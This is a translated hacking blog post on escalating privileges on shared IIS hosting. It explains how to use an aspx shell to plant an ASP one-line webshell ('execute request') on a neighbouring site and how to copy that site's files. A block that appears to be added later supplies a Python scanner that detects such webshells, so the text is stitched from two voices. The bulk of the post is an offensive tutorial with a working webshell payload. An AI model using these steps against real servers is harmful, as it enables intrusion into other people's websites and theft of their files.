Summary on permission escalation for websites supporting aspx


Author: foolishqiang
Original article address: http://hi.baidu.com/foolishqiang


Here I just want to make one point:

An aspx script always runs with more permissions than an asp script. The permission of asp is smaller than that of guest, while that of aspx is similar to that of user.

So obviously,

Let me give you two examples:

The first one: working from another site on the same server, we cannot jump to website B, but the server supports aspx.

Now let's see whether we can execute cmd. If we upload net1 and cmd ourselves and they can be executed, the probability of taking the target site is about 70-80%.

We can write a one-sentence (one-line) Trojan to the target site. Or, if we do not have write permission but do have read permission, we can simply copy a file from the target site into the directory of our own site.

I know many people will not understand it. For example:

Execute the following in the aspx script, writing the output to an .asp file:

echo ^<^%execute request("foolishqiang")^%^>

In this way, a Trojan horse, Silly.asp, will appear in the target site's directory.

If you do not understand, you only need to execute this statement in the shell on your own site, and then connect with a one-sentence client to the target site address + Silly.asp

Check whether it is hello. Haha.
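
From the defending side, the file dropped in the step above is easy to hunt for. The following Python scanner is an added example, not part of the original article: it walks a web root and flags script files that contain the execute request(...) one-liner, including spaced, mixed-case and UTF-16 encoded variants. The function names, the extension list and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# "<% execute|eval ( request" inside one script tag, any case or spacing.
ONE_LINER = re.compile(r"<%[^%]{0,40}?\b(?:execute|executeglobal|eval)\b\s*\(?\s*request\b", re.I)
# Assumed list of script extensions; extend it to match the server's handler mappings.
SCRIPT_EXTS = {".asp", ".asa", ".cer", ".cdx", ".aspx"}

def decode(raw: bytes) -> str:
    """Decode file bytes; a UTF-16 BOM would hide the pattern from a byte-level grep."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16", errors="replace")
    return raw.decode("latin-1")

def find_one_line_shells(web_root: str, max_bytes: int = 1_000_000):
    """Return sorted (relative path, size in bytes, matched text) tuples."""
    hits = []
    for folder, _dirs, files in os.walk(web_root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXTS:
                continue
            path = os.path.join(folder, name)
            with open(path, "rb") as fh:
                text = decode(fh.read(max_bytes))
            match = ONE_LINER.search(text)
            if match:
                rel = os.path.relpath(path, web_root).replace(os.sep, "/")
                hits.append((rel, os.path.getsize(path), match.group(0)))
    return sorted(hits)

def write_sample_tree(root: str) -> None:
    """Constructed sample web root, not data from the article."""
    samples = {
        "index.asp": b'<% Response.Write("hello") %>',           # benign page
        "Silly.asp": b'<%execute request("foolishqiang")%>',     # the article's one-liner
        "img/logo.CER": '<% EXECUTE ( Request("foolishqiang") ) %>'.encode("utf-16"),
        "notes.txt": b'<%execute request("foolishqiang")%>',     # not a script extension
    }
    for rel, data in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        write_sample_tree(tmp)
        for hit in find_one_line_shells(tmp):
            print(hit)
```

Run it per site root and compare the hits against the deployment manifest: a file of a few dozen bytes that the site owner never deployed is the signal to investigate.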

If we do not have write permission, I think we will certainly have read permission.

Construct the statement:

copy [target website directory]/index.htm [our website directory]

Haha, a file has been copied. What is it like?

Does it look like New Cloud's old vulnerability? With it we can download the files on the target site.

It depends on how you use it.


Let me explain. If the cmd component on the target site has been deleted, then as long as the site supports aspx (most sites do), we can completely bypass the cmd component: we construct a cmd command locally and execute it remotely. Was this article helpful?

I am only offering this to get the discussion started. Don't laugh.
